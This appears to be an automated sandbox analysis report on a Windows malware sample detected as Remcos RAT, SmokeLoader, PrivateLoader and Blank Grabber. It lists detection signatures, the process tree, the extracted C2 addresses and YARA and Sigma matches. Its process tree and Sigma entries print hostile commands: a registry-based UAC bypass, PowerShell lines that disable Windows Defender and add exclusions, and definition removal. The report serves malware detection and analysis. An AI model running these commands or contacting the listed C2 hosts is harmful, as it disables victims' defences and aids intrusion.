
Windows Analysis Report
Og1SeeXcB2.exe

Overview

General Information

Sample name: Og1SeeXcB2.exe (renamed because the original name is a hash value)
Original sample name: 150e9ffdac7f2361c2efa735929aa268.exe
Analysis ID: 1438370
MD5: 150e9ffdac7f2361c2efa735929aa268
SHA1: 3ed43e5fb5cd202d91fe31c4a0f8674e5fdb0759
SHA256: d54259b35ece6e39b159317128bfd62f88abbaadd92537379c4bae078e82fe69
Tags: exe

Detection

Detected families: Remcos, Blank Grabber, PrivateLoader, SmokeLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Blank Grabber
Yara detected PrivateLoader
Yara detected Remcos RAT
Yara detected SmokeLoader
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • Og1SeeXcB2.exe (PID: 6612 cmdline: "C:\Users\user\Desktop\Og1SeeXcB2.exe" MD5: 150E9FFDAC7F2361C2EFA735929AA268)
    • cmd.exe (PID: 6800 cmdline: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7012 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2004 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7128 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7136 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4080 cmdline: cmd /c md 1181 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1432 cmdline: findstr /V "perulesserpalacecorrespondence" Video MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7148 cmdline: cmd /c copy /b Outlook + Imports 1181\U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • End.pif (PID: 2120 cmdline: 1181\End.pif 1181\U MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 7072 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 7068 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
        • End.pif (PID: 6992 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif MD5: 62D09F076E6E0240548C2F837536A46A)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • DE5A.exe (PID: 4348 cmdline: C:\Users\user\AppData\Local\Temp\DE5A.exe MD5: CB769D049C4541F926F5D6B8D1FF5929)
              • DE5A.exe (PID: 3468 cmdline: C:\Users\user\AppData\Local\Temp\DE5A.exe MD5: CB769D049C4541F926F5D6B8D1FF5929)
                • cmd.exe (PID: 1612 cmdline: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 1888 cmdline: reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 2516 cmdline: reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • cmd.exe (PID: 5592 cmdline: C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • wevtutil.exe (PID: 5184 cmdline: wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D)
                • cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • ComputerDefaults.exe (PID: 412 cmdline: computerdefaults --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                  • ComputerDefaults.exe (PID: 1284 cmdline: "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                  • ComputerDefaults.exe (PID: 1988 cmdline: "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass MD5: D25A9E160E3B74EF2242023726F15416)
                    • DE5A.exe (PID: 3588 cmdline: "C:\Users\user\AppData\Local\Temp\DE5A.exe" MD5: CB769D049C4541F926F5D6B8D1FF5929)
                      • DE5A.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Local\Temp\DE5A.exe" MD5: CB769D049C4541F926F5D6B8D1FF5929)
                        • cmd.exe (PID: 2312 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4908 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                        • cmd.exe (PID: 2116 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4928 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
                          • MpCmdRun.exe (PID: 3760 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
                        • cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • powershell.exe (PID: 4416 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                            • WmiPrvSE.exe (PID: 5180 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                        • cmd.exe (PID: 5720 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • bound.exe (PID: 1860 cmdline: bound.exe MD5: E5C79A33139A13DAAC52DA8DD0ABFC68)
                            • WindowsUpdateServices.exe (PID: 6948 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe" MD5: E5C79A33139A13DAAC52DA8DD0ABFC68)
                              • iexplore.exe (PID: 2004 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
                        • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • tasklist.exe (PID: 5856 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                        • cmd.exe (PID: 5084 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • WMIC.exe (PID: 6460 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • wevtutil.exe (PID: 1016 cmdline: wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D)
                • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • reg.exe (PID: 5212 cmdline: reg delete hkcu\Software\Classes\ms-settings /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • PING.EXE (PID: 3548 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wsruwii (PID: 1028 cmdline: C:\Users\user\AppData\Roaming\wsruwii MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
Malware descriptions (Malpedia)

Name: Remcos (aka RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: PrivateLoader
Description: According to Sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.
Attribution: no attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Malware Configuration

SmokeLoader:
{
  "Version": 2022,
  "C2 list": [
    "http://cellc.org/tmp/index.php",
    "http://h-c-v.ru/tmp/index.php",
    "http://icebrasilpr.com/tmp/index.php",
    "http://piratia-life.ru/tmp/index.php",
    "http://piratia.su/tmp/index.php"
  ]
}

Remcos:
{
  "Host:Port:Password": "193.149.176.178:2404:1",
  "Assigned name": "WindowsUpdateServices",
  "Connect interval": "1",
  "Install flag": "Enable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "AppData",
  "Copy file": "WindowsUpdateServices.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-ZZZU66",
  "Keylog flag": "0",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key
  Rule: JoeSecurity_BlankGrabber (Yara detected Blank Grabber); Author: Joe Security

Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe
  Rule: JoeSecurity_Remcos (Yara detected Remcos RAT); Author: Joe Security
  Rule: JoeSecurity_UACBypassusingCMSTP (Yara detected UAC Bypass using CMSTP); Author: Joe Security
  Rule: JoeSecurity_PrivateLoader (Yara detected PrivateLoader); Author: Joe Security
  Rule: Windows_Trojan_Remcos_b296e965; Author: unknown; matched strings:
    0x6aaa8:$a1: Remcos restarted by watchdog!
    0x6b020:$a3: %02i:%02i:%02i:%03i

(3 further entries are collapsed in the original report)
Memory Dumps

Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos (Yara detected Remcos RAT); Author: Joe Security
  Rule: JoeSecurity_UACBypassusingCMSTP (Yara detected UAC Bypass using CMSTP); Author: Joe Security
  Rule: Windows_Trojan_Remcos_b296e965; Author: unknown; matched strings:
    0xaa60:$a1: Remcos restarted by watchdog!
    0xafd8:$a3: %02i:%02i:%02i:%03i

Source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_BlankGrabber (Yara detected Blank Grabber); Author: Joe Security

Source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_BlankGrabber (Yara detected Blank Grabber); Author: Joe Security

(65 further entries are collapsed in the original report)
Unpacked PEs

Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack
  Rule: JoeSecurity_Remcos (Yara detected Remcos RAT); Author: Joe Security
  Rule: JoeSecurity_UACBypassusingCMSTP (Yara detected UAC Bypass using CMSTP); Author: Joe Security
  Rule: JoeSecurity_PrivateLoader (Yara detected PrivateLoader); Author: Joe Security
  Rule: Windows_Trojan_Remcos_b296e965; Author: unknown; matched strings:
    0x6aaa8:$a1: Remcos restarted by watchdog!
    0x6b020:$a3: %02i:%02i:%02i:%03i
  Rule: REMCOS_RAT_variants; Author: unknown; matched strings:
    0x64afc:$str_a1: C:\Windows\System32\cmd.exe
    0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    0x64b6c:$str_b2: Executing file:
    0x65bec:$str_b3: GetDirectListeningPort
    0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    0x65718:$str_b7: \update.vbs
    0x64b94:$str_b9: Downloaded file:
    0x64b80:$str_b10: Downloading file:
    0x64c24:$str_b12: Failed to upload file:
    0x65bb4:$str_b13: StartForward
    0x65bd4:$str_b14: StopForward
    0x65670:$str_b15: fso.DeleteFile "
    0x65604:$str_b16: On Error Resume Next
    0x656a0:$str_b17: fso.DeleteFolder "
    0x64c14:$str_b18: Uploaded file:
    0x64bd4:$str_b19: Unable to delete:
    0x65638:$str_b20: while fso.FileExists("
    0x650b1:$str_c0: [Firefox StoredLogins not found]

(43 further entries are collapsed in the original report)

Sigma Overview

Privilege Escalation

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 3468, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f", ProcessId: 1612, ProcessName: cmd.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DE5A.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 5632, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", ProcessId: 2312, ProcessName: cmd.exe

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DE5A.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 5632, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2116, ProcessName: cmd.exe

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2312, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe', ProcessId: 4908, ProcessName: powershell.exe

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 1860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-ZZZU66

Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: 1181\End.pif 1181\U, CommandLine: 1181\End.pif 1181\U, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: 1181\End.pif 1181\U, ProcessId: 2120, ProcessName: End.pif

Source: Thread created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, SourceProcessId: 2004, StartAddress: 330F7A7, TargetImage: C:\Windows\SysWOW64\findstr.exe, TargetProcessId: 2004

Source: Process started; Author: frack113; Data: Command: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 3468, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", ProcessId: 3796, ProcessName: cmd.exe

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 1860, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-ZZZU66

